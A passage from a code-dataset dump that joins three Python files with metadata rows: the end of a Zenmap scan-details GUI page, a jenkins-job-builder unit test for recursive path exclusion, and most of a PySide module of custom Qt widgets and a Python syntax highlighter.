self.info_closed_label.set_text(str(scan.get_closed_ports()))
for scaninfo in scan.get_scaninfo():
exp = gtk.Expander('<b>%s - %s</b>' % (_('Scan Info'), scaninfo['type'].capitalize()))
exp.set_use_markup(True)
display = self.make_scaninfo_display(scaninfo)
exp.add(display)
self._pack_noexpand_nofill(exp)
def make_scaninfo_display(self, scaninfo):
"""Return a widget displaying a scan's "scaninfo" information: type,
protocol, number of scanned ports, and list of services."""
hbox = HIGHBox()
table = HIGTable()
table.set_border_width(5)
table.set_row_spacings(6)
table.set_col_spacings(6)
table.attach(HIGEntryLabel(_('Scan type:')),0,1,0,1)
table.attach(HIGEntryLabel(scaninfo['type']),1,2,0,1)
table.attach(HIGEntryLabel(_('Protocol:')),0,1,1,2)
table.attach(HIGEntryLabel(scaninfo['protocol']),1,2,1,2)
table.attach(HIGEntryLabel(_('# scanned ports:')),0,1,2,3)
table.attach(HIGEntryLabel(scaninfo['numservices']),1,2,2,3)
table.attach(HIGEntryLabel(_('Services:')),0,1,3,4)
table.attach(self.make_services_display(scaninfo['services']),1,2,3,4)
hbox._pack_noexpand_nofill(hig_box_space_holder())
hbox._pack_noexpand_nofill(table)
return hbox
def make_services_display(self, services):
"""Return a widget displaying a list of services like
1-1027,1029-1033,1040,1043,1050,1058-1059,1067-1068,1076,1080"""
combo = gtk.combo_box_new_text()
for i in services.split(","):
combo.append_text(i)
return combo
if __name__ == "__main__":
import sys
from zenmapCore.NmapParser import NmapParser
filename = sys.argv[1]
parsed = NmapParser()
parsed.parse_file(filename)
run_details = ScanRunDetailsPage(parsed)
window = gtk.Window()
window.add(run_details)
window.connect("delete-event", lambda *args: gtk.main_quit())
window.show_all()
gtk.main()
| gpl-2.0 | 135,565,421,673,264,290 | 52.172414 | 98 | 0.598161 | false |
joostvdg/jenkins-job-builder | tests/cmd/test_recurse_path.py | 1 | 4946 | import os
from tests.base import mock
import testtools
from jenkins_jobs import utils
def fake_os_walk(paths):
"""Helper function for mocking os.walk() where must test that manipulation
of the returned dirs variable works as expected
"""
paths_dict = dict(paths)
def os_walk(top, topdown=True):
dirs, nondirs = paths_dict[top]
yield top, dirs, nondirs
for name in dirs:
# hard code use of '/' to ensure the test data can be defined as
# simple strings otherwise tests using this helper will break on
# platforms where os.path.sep is different.
new_path = "/".join([top, name])
for x in os_walk(new_path, topdown):
yield x
return os_walk
# Testing the utils module can sometimes result in the CacheStorage class
# attempting to create the cache directory multiple times as the tests
# are run in parallel. Stub out the CacheStorage to ensure that each
# test can safely create the object without effect.
@mock.patch('jenkins_jobs.builder.CacheStorage', mock.MagicMock)
class CmdRecursePath(testtools.TestCase):
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_pattern(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using pattern
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', (['test1'], ('file'))),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', None),
('/jjb_configs/test3/baz', None)
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs', ['test*']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_absolute(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using absolute
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', None),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/test3', (['bar', 'baz'], ())),
('/jjb_configs/dir2/test2', ([], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', ([], ())),
('/jjb_configs/test3/baz', ([], ()))
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs',
['/jjb_configs/dir1']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_relative(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using relative
excludes.
testing paths
./jjb_configs/dir1/test/
./jjb_configs/dir1/file
./jjb_configs/dir2/test/
./jjb_configs/dir3/bar/
./jjb_configs/test3/bar/
./jjb_configs/test3/baz/
"""
os_walk_paths = [
('jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('jjb_configs/dir1', (['test'], ('file'))),
('jjb_configs/dir2', (['test2'], ())),
('jjb_configs/dir3', (['bar'], ())),
('jjb_configs/test3', (['bar', 'baz'], ())),
('jjb_configs/dir1/test', ([], ())),
('jjb_configs/dir2/test2', ([], ())),
('jjb_configs/dir3/bar', ([], ())),
('jjb_configs/test3/bar', None),
('jjb_configs/test3/baz', ([], ()))
]
rel_os_walk_paths = [
(os.path.abspath(
os.path.join(os.path.curdir, k)), v) for k, v in os_walk_paths]
paths = [k for k, v in rel_os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(rel_os_walk_paths)
self.assertEqual(paths, utils.recurse_path('jjb_configs',
['jjb_configs/test3/bar']))
| apache-2.0 | -2,137,185,602,599,578,600 | 35.367647 | 79 | 0.531945 | false |
davidsoncolin/IMS | UI/QCore.py | 1 | 53288 | #!/usr/bin/env python
import functools
import numpy as np
from PySide import QtCore, QtGui
from GCore import State
from UI import createAction
import weakref
class QListWidget(QtGui.QListView):
item_selected = QtCore.Signal(int)
focus_changed = QtCore.Signal(bool)
item_renamed = QtCore.Signal(str, str)
data_changed = QtCore.Signal(dict)
def __init__(self, items=[], parent=None, renameEnabled=False):
super(QListWidget, self).__init__(parent)
self.item_count = 0
self.renameEnabled = renameEnabled
self.overrideSelection = None
self.selectedItem = None
self.item_list_model = None
self.item_selection_model = None
self.setDragEnabled(True)
self.setDragDropOverwriteMode(False)
self.setDragDropMode(QtGui.QAbstractItemView.InternalMove)
self.createWidgets()
for item in items:
self.addItem(item)
def count(self):
return self.item_count
def createWidgets(self):
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.DisplayRole)
self.item_list_model.dataChanged.connect(self.handleDataChange)
self.setModel(self.item_list_model)
self.item_selection_model = self.selectionModel()
self.item_selection_model.selectionChanged.connect(self.handleItemSelect)
self.setMinimumHeight(60)
self.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred))
def handleDataChange(self, *args):
print ("Data Change: {}".format(args))
self.overrideSelection = args[0].row()
newText = self.getItem(args[0].row(), QtCore.Qt.DisplayRole)
if newText != self.selectedItem:
self.item_renamed.emit(self.selectedItem, newText)
self.selectedItem = newText
else:
self.data_changed.emit({})
def focusInEvent(self, *args):
self.focus_changed.emit(True)
def focusOutEvent(self, *args):
self.focus_changed.emit(False)
def handleItemSelect(self, *args):
if self.overrideSelection is not None:
self.setUserSelection(self.overrideSelection)
self.overrideSelection = None
return
try:
self.selectedItem = self.getItem(self.getSelection(), QtCore.Qt.DisplayRole)
print ("Selected: {}".format(self.selectedItem))
self.item_selected.emit(self.getSelection())
except AttributeError:
pass
def getSelection(self):
try:
selection = self.item_selection_model.selection().indexes()[0].row()
except IndexError:
selection = -1
return selection
def removeItem(self, index):
self.item_list_model.takeRow(index)
self.item_count -= 1
def clear(self):
while self.item_count:
self.removeItem(0)
def addItem(self, mitem, data='', index=None):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
item.setData(data, QtCore.Qt.UserRole)
item.setEditable(self.renameEnabled)
item.setDropEnabled(False)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
if index is None:
self.item_list_model.appendRow(item)
else:
self.item_list_model.insertRow(index, item)
self.item_count += 1
def addItems(self, items):
for item in items:
self.addItem(item)
def setUserSelection(self, index):
if self.item_count > 0:
self.setCurrentIndex(self.item_list_model.item(index).index())
self.selectedItem = self.getItem(index, QtCore.Qt.DisplayRole)
def getItems(self, role=None):
if role is None:
return [self.item_list_model.item(i) for i in xrange(0, self.item_count)]
else:
return [self.item_list_model.item(i).data(role) for i in xrange(0, self.item_count)]
def getItem(self, index, role=None):
if role is None:
return self.item_list_model.item(index)
else:
return self.item_list_model.item(index).data(role)
class QNodeWidget(QListWidget):
def __init__(self, parent):
super(QNodeWidget, self).__init__(parent=parent)
self.cookFrom = -1
self.connect(self, QtCore.SIGNAL("doubleClicked(QModelIndex)"), self, QtCore.SLOT("ItemDoubleClicked(QModelIndex)"))
def addItem(self, mitem, data='', index=None):
super(QNodeWidget, self).addItem(mitem, data, index)
def getNodes(self):
items = self.getItems(QtCore.Qt.DisplayRole)
if self.cookFrom == -1: return items
evaluate = items[:self.cookFrom + 1]
return evaluate
def ItemDoubleClicked(self, index):
self.changeCookIndex(self.getSelection(), False)
def changeCookIndex(self, index, allowDeselect=False, flush=True):
selectedItem = self.getItem(index)
if index == self.cookFrom and allowDeselect:
self.cookFrom = -1
selectedItem.setBackground(QtGui.QColor(255, 255, 255))
else:
prevCookIndex = self.cookFrom
self.cookFrom = index
if prevCookIndex != -1:
self.getItem(prevCookIndex).setBackground(QtGui.QColor(255, 255, 255))
selectedItem.setBackground(QtGui.QColor(50, 0, 180, 150))
self.data_changed.emit({'flush': flush})
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_P:
self.changeCookIndex(self.getSelection())
class QOrderedListWidget(QtGui.QGroupBox):
''' A list widget where the order of items is important and can be
changed by the user '''
item_edit = QtCore.Signal(int, list)
def __init__(self, items=[], parent=None):
super(QOrderedListWidget, self).__init__(parent)
self.item_count = 0
self.createWidgets()
self.createMenus()
self.setTitle("Items")
for item in items:
self.addItem(item)
def createWidgets(self):
self._itemList = QtGui.QListView(self)
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.UserRole + 1)
self._itemList.setModel(self.item_list_model)
self.item_list_model.dataChanged.connect(self.handleDataChange)
plsm = self._itemList.selectionModel()
plsm.selectionChanged.connect(self._handleItemSelect)
self._itemList.setMinimumHeight(60)
self.toolBar = QtGui.QToolBar(self)
self.toolBar.setOrientation(QtCore.Qt.Vertical)
self._itemList.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)) # .MinimumExpanding))
layout = QtGui.QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._itemList)
layout.addWidget(self.toolBar)
self.setLayout(layout)
def move(self, di=1):
""" move the selected item up (di=-1) or down (di=1). Updates the model(ui) and the
ik item order """
sm = self._itemList.selectionModel()
try:
selectedIndex = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
order = selectedIndex.data(QtCore.Qt.UserRole + 1)
# if it will be moved out of list bounds then skip
if (order + di) < 0 or (order + di) >= self.item_count: return
# swap the two items in the list model.
self.item_list_model.item(order).setData(order + di, QtCore.Qt.UserRole + 1)
self.item_list_model.item(order + di).setData(order, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = sm.selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def handleDataChange(self):
pass
def _handleItemSelect(self, selected, deselected):
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def setUserSelection(self, index):
if self.item_count > 0: self._itemList.setCurrentIndex(self.item_list_model.item(index).index())
def createMenus(self):
# http://standards.freedesktop.org/icon-naming-spec/icon-naming-spec-latest.html
up = createAction('Up', self, [functools.partial(self.move, -1)], 'Move item up', icon=QtGui.QIcon.fromTheme("go-up"))
down = createAction('Down', self, [functools.partial(self.move, 1)], 'Move item down', icon=QtGui.QIcon.fromTheme("go-down"))
remove = createAction('Remove', self, [functools.partial(self.removeItem)], 'Remove item', icon=QtGui.QIcon.fromTheme("edit-delete"))
self.toolBar.addAction(up)
self.toolBar.addAction(down)
self.toolBar.addAction(remove)
def removeItem(self):
sm = self._itemList.selectionModel()
try:
selected_item = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
selected_index = selected_item.data(QtCore.Qt.UserRole + 1)
removed_row = self.item_list_model.takeRow(selected_index)
self.item_count = self.item_count - 1
for i in xrange(selected_index, self.item_count):
self.item_list_model.item(i).setData(i, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def addItem(self, mitem, ignore=False):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
item.setData(self.item_count, QtCore.Qt.UserRole + 1)
self.item_list_model.appendRow(item)
self.item_count = self.item_count + 1
if not ignore:
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def getItems(self):
return [self.item_list_model.item(i).data(QtCore.Qt.DisplayRole) for i in xrange(0, self.item_count)]
class Qselect(QtGui.QComboBox):
'''Qselect is like a QComboBox, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
def __init__(self, parent=None, options=None, default=None, cb=None):
QtGui.QComboBox.__init__(self, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
if options != None:
for item in options: self.addItem(item)
if default != None:
self.setCurrentIndex(options.index(default))
self.cb = cb
self.connect(self, QtCore.SIGNAL('currentIndexChanged(int)'), self.callback)
def callback(self, val):
if self.cb != None: self.cb(self, val)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QComboBox.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QComboBox.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QComboBox.focusOutEvent(self, e)
class Qslide(QtGui.QSlider):
'''Qslide is like a QSlider, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
def __init__(self, orient, parent=None):
QtGui.QSlider.__init__(self, orient, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QSlider.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QSlider.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QSlider.focusOutEvent(self, e)
class QslideLimitControl(QtGui.QGroupBox):
''' A control that contains a slider and a textbox useful for easy embedding in an app '''
# TODO handle scrollwheel and keyboard behaviour better, currently it scrolls by the slider units
# which can be very small
value_changed = QtCore.Signal(float)
def __init__(self, loval=0, hival=100, parent=None):
QtGui.QGroupBox.__init__(self, parent)
self.parent = parent
self.limits = [loval, hival]
self.digits = 2
self.valueIsAdjusting = False
self.createWidgets(loval, hival)
self.createLayout()
self.setStyleSheet("border:0;")
def createWidgets(self, loval, hival):
self.slider = Qslide(QtCore.Qt.Horizontal, self.parent)
self.value = loval
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(self.value / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(loval / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.setDisplayText(self.value / unit)
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
def createLayout(self):
layout = QtGui.QGridLayout()
layout.setColumnStretch(0, 5)
layout.setColumnStretch(1, 2)
layout.addWidget(self.slider)
layout.addWidget(self.display)
self.setLayout(layout)
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
self.value_changed.emit(self.value)
return self.value
def setLo(self, value):
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[1] = self.slider.maximum() * self.slider.unit / self.display.unit
return value
def setHi(self, value):
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[0] = self.slider.minimum() * self.slider.unit / self.display.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.valueIsAdjusting = False
def setDisplayText(self, value):
self.display.setText(str(round(value, self.digits)))
# POTENTIALLY DEPRECATED
class QslideLimitValue(QtGui.QGridLayout):
'''An object that wraps the layout and gui elements for a floating point value control with limits.'''
def __init__(self, name, value, loval, hival, cb, cbActor, parent=None):
QtGui.QGridLayout.__init__(self)
self.setColumnStretch(0, 1)
self.setColumnStretch(1, 5)
self.setColumnStretch(2, 2)
self.setColumnStretch(3, 1)
self.setColumnStretch(4, 1)
self.slider = Qslide(QtCore.Qt.Horizontal, parent)
self.value = value
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(loval / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(value / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.display.setText(str(value / unit))
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
self.limits = [loval, hival]
self.lo = QtGui.QLineEdit()
self.lo.setMaxLength(10)
self.lo.unit = unit
self.lo.setText(str(loval / unit))
self.lo.editingFinished.connect(self.loSet) # this folds the values of self and di into the callback
self.hi = QtGui.QLineEdit()
self.hi.setMaxLength(10)
self.hi.unit = unit
self.hi.setText(str(hival / unit))
self.hi.editingFinished.connect(self.hiSet) # this folds the values of self and di into the callback
self.name = name
self.label = QtGui.QLabel('<font size=8em>%s</font>' % name)
self.addWidget(self.label)
self.addWidget(self.slider)
self.addWidget(self.display)
self.addWidget(self.lo)
self.addWidget(self.hi)
self.cb = cb
self.cbActor = cbActor
self.valueIsAdjusting = False
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
print ("setValue")
self.cb(self.cbActor, self.name, self.value)
return self.value
def setLo(self, x, unit):
# do validation
value = float(x) * unit
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.hi.setText(str(self.slider.maximum() * self.slider.unit / self.hi.unit))
self.limits[1] = self.slider.maximum() * self.slider.unit / self.hi.unit
return value
def setHi(self, x, unit):
# do validation
value = float(x) * unit
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.lo.setText(str(self.slider.minimum() * self.slider.unit / self.lo.unit))
self.limits[0] = self.slider.minimum() * self.slider.unit / self.lo.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.valueIsAdjusting = False
def loSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.lo.text())
value = self.setLo(v, self.lo.unit)
self.lo.setText(str(value / self.lo.unit))
except:
self.lo.setText(str(self.limits[0] / self.lo.unit))
self.valueIsAdjusting = False
def hiSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.hi.text())
value = self.setHi(self.hi.text(), self.hi.unit)
self.hi.setText(str(value / self.hi.unit))
except:
self.hi.setText(str(self.limits[1] / self.hi.unit))
self.valueIsAdjusting = False
class QintWidget(QtGui.QLineEdit):
''' draggable spin box. ctrl+ left, middle or right button will scrub the values in the spinbox
by different amounts
'''
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QintWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 1
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Add a Validator
int_validator = intValidator(self)
self.setValidator(int_validator)
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = int(v) # ensure it's an int!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min,max)
# print "Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top()))
except:
print ("Inputs to QintWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return int(self.text())
def text(self):
ret = super(QintWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
class QLineWidget(QtGui.QLineEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QLineWidget, self).__init__(parent)
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return self.text()
def text(self):
ret = super(QLineWidget, self).text()
return ret
class QTextWidget(QtGui.QTextEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QTextWidget, self).__init__(parent)
self.setTabChangesFocus(True)
self.current_value = None
self.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultHighlighter = PythonHighlighter(self)
def focusOutEvent(self, event):
super(QTextWidget, self).focusOutEvent(event)
self.setValue(self.toPlainText())
def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def value(self):
return self.value()
class QCommandEntryWidget(QtGui.QTextEdit):
def __init__(self, *args):
QtGui.QTextEdit.__init__(self, *args)
self.setAcceptRichText(False)
def keyPressEvent(self, keyEvent):
if (
(keyEvent.key() == QtCore.Qt.Key_Enter) or
(keyEvent.key() == QtCore.Qt.Key_Return and
keyEvent.modifiers() & QtCore.Qt.ControlModifier)):
self.emit(QtCore.SIGNAL('enterPressed()'))
elif keyEvent.key() == QtCore.Qt.Key_Tab:
keyEvent.accept()
self.emit(QtCore.SIGNAL('tabPressed()'))
else:
QtGui.QTextEdit.keyPressEvent(self, keyEvent)
class HighlightingRule:
def __init__(self, pattern, format):
self.pattern = pattern
self.format = format
class PythonHighlighter(QtGui.QSyntaxHighlighter):
"""
Python Highlighter code borrowed from
http://wiki.python.org/moin/PyQt/Python syntax highlighting
"""
def __init__(self, document):
QtGui.QSyntaxHighlighter.__init__(self, document)
self.document = document
self.highlightingRules = []
STYLES = {
'keyword': self.format('blue'),
'operator': self.format('black'),
'brace': self.format('brown'),
'defclass': self.format('darkBlue', 'bold'),
'string': self.format('magenta'),
'string2': self.format('darkMagenta'),
'comment': self.format('darkGreen', 'italic'),
'self': self.format('black', 'italic'),
'numbers': self.format('purple'),
}
# Python keywords
keywords = [
'and', 'assert', 'break', 'class', 'continue', 'def',
'del', 'elif', 'else', 'except', 'exec', 'finally',
'for', 'from', 'global', 'if', 'import', 'in',
'is', 'lambda', 'not', 'or', 'pass', 'print',
'raise', 'return', 'try', 'while', 'yield',
'None', 'True', 'False',
]
# Python operators
operators = [
'=',
# Comparison
'==', '!=', '<', '<=', '>', '>=',
# Arithmetic
'\+', '-', '\*', '/', '//', '\%', '\*\*',
# In-place
'\+=', '-=', '\*=', '/=', '\%=',
# Bitwise
'\^', '\|', '\&', '\~', '>>', '<<',
]
# Python braces
braces = [
'\{', '\}', '\(', '\)', '\[', '\]',
]
self.tri_single = (QtCore.QRegExp("'''"), 1, STYLES['string2'])
self.tri_double = (QtCore.QRegExp('"""'), 2, STYLES['string2'])
rules = []
# Keyword, operator, and brace rules
rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
for w in keywords]
rules += [(r'%s' % o, 0, STYLES['operator'])
for o in operators]
rules += [(r'%s' % b, 0, STYLES['brace'])
for b in braces]
# All other rules
rules += [
# 'self'
(r'\bself\b', 0, STYLES['self']),
# Double-quoted string, possibly containing escape sequences
(r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
# Single-quoted string, possibly containing escape sequences
(r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
# 'def' followed by an identifier
(r'\bdef\b\s*(\w+)', 1, STYLES['defclass']),
# 'class' followed by an identifier
(r'\bclass\b\s*(\w+)', 1, STYLES['defclass']),
# From '#' until a newline
(r'#[^\n]*', 0, STYLES['comment']),
# Numeric literals
(r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b', 0, STYLES['numbers']),
]
# Build a QRegExp for each pattern
self.rules = [(QtCore.QRegExp(pat), index, fmt) for (pat, index, fmt) in rules]
def format(self, color, style=''):
_color = QtGui.QColor()
_color.setNamedColor(color)
_format = QtGui.QTextCharFormat()
_format.setForeground(_color)
if 'bold' in style:
_format.setFontWeight(QtGui.QFont.Bold)
if 'italic' in style:
_format.setFontItalic(True)
return _format
def highlightBlock(self, text):
# Do other syntax formatting
for expression, nth, format in self.rules:
index = expression.indexIn(text, 0)
while index >= 0:
